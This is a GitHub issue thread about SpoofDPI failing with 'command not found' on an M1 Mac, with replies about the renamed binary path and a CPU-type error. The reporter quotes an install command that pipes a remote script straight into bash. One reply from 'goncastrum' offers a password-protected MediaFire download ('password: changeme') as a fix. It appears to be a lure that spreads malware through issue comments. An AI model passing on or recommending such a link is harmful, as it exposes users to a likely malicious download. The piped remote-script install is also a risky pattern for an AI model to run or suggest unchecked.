### ISSUE TITLE
zsh: command not found

### ISSUE THREAD

**Issue by EladarWasTaken** [xvzc/SpoofDPI#232]
### Version

Latest? (Just installed, but can't run version command)

### Operating System

Mac OS M1 Sonoma 14.6.1

### How are you running SpoofDPI?

curl -fsSL https://raw.githubusercontent.com/xvzc/SpoofDPI/main/install.sh | bash -s darwin-amd64

export PATH=$PATH:~/.spoof-dpi/bin

spoof-dpi --enable-doh --window-size 0

### Description

When I run the command "spoof-dpi --enable-doh --window-size 0" it says "zsh: command not found: spoof-dpi". Same for "spoofdpi" command. I used "export PATH=$PATH:~/.spoof-dpi/bin" before typing in the command and it works fine on my older Mac OS.

**Comment by Mauladen** [comment]
It has changed a little
For the latest version:

`export PATH=$PATH:~/.spoofdpi/bin`
`spoofdpi --enable-doh --window-size 0`

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by AlexandrPerov** [comment]
bad CPU type in executable: spoofdpi 
after use this bad CPU type in executable: spoofdpi command
